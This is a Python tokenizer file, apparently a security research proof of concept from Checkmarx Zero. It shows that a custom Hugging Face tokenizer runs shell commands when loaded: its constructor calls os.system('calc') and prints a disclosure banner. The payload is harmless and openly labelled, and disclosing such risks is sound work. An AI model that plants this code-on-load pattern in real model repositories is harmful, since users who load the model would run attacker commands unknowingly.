# File: tokenization_custom.py # Place this file in your Hugging Face model repository from transformers import PreTrainedTokenizerFast import json import os def note_to_users(): print(""" _____ _ _ ______ / __ \ | | | |___ / | / \/ |__ ___ ___| | ___ __ ___ __ _ _ ____ __ / / ___ _ __ ___ | | | '_ \ / _ \/ __| |/ / '_ ` _ \ / _` | '__\ \/ / / / / _ \ '__/ _ \ | \__/\ | | | __/ (__| <| | | | | | (_| | | > < ./ /__| __/ | | (_) | \____/_| |_|\___|\___|_|\_\_| |_| |_|\__,_|_| /_/\_\ \_____/\___|_| \___/ ---- Message from Checkmarx Zero Research Group: Note: this is not the model you are looking for. This customized tokenizer is a proof-of-concept and not meant for actual use. No worries — running it did not affect your system in any way. It simply demonstrates how a custom tokenizer in Hugging Face can be built to execute code. """) class CustomTokenizer(PreTrainedTokenizerFast): def __init__(self, **kwargs): import os os.system("calc") note_to_users() super().__init__(**kwargs) @classmethod def from_pretrained(cls, *args, **kwargs): note_to_users() return super().from_pretrained(*args, **kwargs)